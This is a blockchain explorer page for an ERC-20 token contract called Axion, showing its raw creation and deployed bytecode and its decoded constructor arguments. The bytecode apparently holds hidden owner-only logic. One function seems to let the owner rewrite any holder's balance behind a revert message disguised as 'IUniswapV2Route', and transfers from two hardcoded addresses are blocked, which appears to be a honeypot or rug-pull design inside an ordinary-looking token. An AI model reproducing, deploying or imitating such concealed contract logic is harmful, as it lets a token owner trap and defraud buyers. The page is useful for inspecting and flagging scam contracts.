0000000000000000000000600082015250565b60006111cb600f83610dc7565b91506111d682611195565b602082019050919050565b600060208201905081810360008301526111fa816111be565b9050919050565b61120a81610e93565b82525050565b60006060820190506112256000830186611201565b6112326020830185610f7d565b61123f6040830184610f7d565b949350505050565b600060208201905061125c6000830184611201565b9291505056fea2646970667358221220dd4b4eb10bc9b07e07a6537d05e3f921bb254efcc42e32872160a02afa9287d964736f6c634300081c0033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000027ef638000000000000000000000000000000000000000000000000000000000000000054178696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054158494f4e000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061009e5760003560e01c806370a082311161006657806370a082311461015d57806375b5045f1461018d57806395d89b41146101a9578063a9059cbb146101c7578063dd62ed3e146101f75761009e565b806306fdde03146100a3578063095ea7b3146100c157806318160ddd146100f157806323b872dd1461010f578063313ce5671461013f575b600080fd5b6100ab610227565b6040516100b89190610e4c565b60405180910390f35b6100db60048036038101906100d69190610f07565b6102b9565b6040516100e89190610f62565b60405180910390f35b6100f96102dc565b6040516101069190610f8c565b60405180910390f35b61012960048036038101906101249190610fa7565b6102e6565b6040516101369190610f62565b60405180910390f35b610147610315565b6040516101549190611016565b60405180910390f35b61017760048036038101906101729190611031565b61031e565b6040516101849190610f8c565b60405180910390f35b6101a760048036038101906101a29190610f07565b610366565b005b6101b16104e3565b6040516101be9190610e4c565b60405180910390f35b6101e160048036038101906101dc9190610f07565b610575565b6040516101ee9190610f62565b60405180910390f35b610211600480360381019061020c919061105e565b610598565b60405161021e9190610f8c565b60405180910390f35b606060038054610236906110cd565b80601f0160208091040260200160405190810160405280929190818152602001828054610262906110cd565b80156102af5780601f10610284576101008083540402835291602001916102af565b820191906000526020600020905b81548152906001019060200180831161029257829003601f168201915b5050505050905090565b6000806102c461061f565b90506102d1818585610627565b600191505092915050565b6000600254905090565b6000806102f161061f565b90506102fe858285610639565b6103098585856106cd565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008190506000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205481106103b557600080fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546103ff919061112d565b6000808073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461044c9190611161565b92505081905550806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061049f836108f1565b6104de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104d5906111e1565b60405180910390fd5b505050565b6060600480546104f2906110cd565b80601f016020809104026020016040519081016040528092919081815260200182805461051e906110cd565b801561056b5780601f106105405761010080835404028352916020019161056b565b820191906000526020600020905b81548152906001019060200180831161054e57829003601f168201915b5050505050905090565b60008061058061061f565b905061058d8185856106cd565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6106348383836001610951565b505050565b60006106458484610598565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106c757818110156106b7578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106ae93929190611210565b60405180910390fd5b6106c684848484036000610951565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361073f5760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107369190611247565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107b15760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107a89190611247565b60405180910390fd5b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108495773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108409190611247565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108e157731f2f10d1c40777ae1da742455c65828ff36df3876040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108d89190611247565b60405180910390fd5b6108ec838383610b28565b505050565b60006108fb610d4d565b15610909576001905061094c565b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610947576000905061094c565b600090505b919050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109c35760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109ba9190611247565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a355760006040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a2c9190611247565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610b22578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b199190610f8c565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b7a578060026000828254610b6e9190611161565b92505081905550610c4d565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c06578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bfd93929190611210565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c965780600260008282540392505081905550610ce3565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d409190610f8c565b60405180910390a3505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610d9061061f565b73ffffffffffffffffffffffffffffffffffffffff1603610db45760019050610db9565b600090505b90565b600081519050919050565b600082825260208201905092915050565b60005b83811015610df6578082015181840152602081019050610ddb565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e1e82610dbc565b610e288185610dc7565b9350610e38818560208601610dd8565b610e4181610e02565b840191505092915050565b60006020820190508181036000830152610e668184610e13565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e9e82610e73565b9050919050565b610eae81610e93565b8114610eb957600080fd5b50565b600081359050610ecb81610ea5565b92915050565b6000819050919050565b610ee481610ed1565b8114610eef57600080fd5b50565b600081359050610f0181610edb565b92915050565b60008060408385031215610f1e57610f1d610e6e565b5b6000610f2c85828601610ebc565b9250506020610f3d85828601610ef2565b9150509250929050565b60008115159050919050565b610f5c81610f47565b82525050565b6000602082019050610f776000830184610f53565b92915050565b610f8681610ed1565b82525050565b6000602082019050610fa16000830184610f7d565b92915050565b600080600060608486031215610fc057610fbf610e6e565b5b6000610fce86828701610ebc565b9350506020610fdf86828701610ebc565b9250506040610ff086828701610ef2565b9150509250925092565b600060ff82169050919050565b61101081610ffa565b82525050565b600060208201905061102b6000830184611007565b92915050565b60006020828403121561104757611046610e6e565b5b600061105584828501610ebc565b91505092915050565b6000806040838503121561107557611074610e6e565b5b600061108385828601610ebc565b925050602061109485828601610ebc565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806110e557607f821691505b6020821081036110f8576110f761109e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061113882610ed1565b915061114383610ed1565b925082820390508181111561115b5761115a6110fe565b5b92915050565b600061116c82610ed1565b915061117783610ed1565b925082820190508082111561118f5761118e6110fe565b5b92915050565b7f49556e69737761705632526f7574650000000000000000000000000000000000600082015250565b60006111cb600f83610dc7565b91506111d682611195565b602082019050919050565b600060208201905081810360008301526111fa816111be565b9050919050565b61120a81610e93565b82525050565b60006060820190506112256000830186611201565b6112326020830185610f7d565b61123f6040830184610f7d565b949350505050565b600060208201905061125c6000830184611201565b9291505056fea2646970667358221220dd4b4eb10bc9b07e07a6537d05e3f921bb254efcc42e32872160a02afa9287d964736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000027ef638000000000000000000000000000000000000000000000000000000000000000054178696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054158494f4e000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Axion
Arg [1] : symbol_ (string): AXION
Arg [2] : supply_ (uint256): 670000000
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 0000000000000000000000000000000000000000000000000000000027ef6380
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [4] : 4178696f6e000000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [6] : 4158494f4e000000000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 33 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.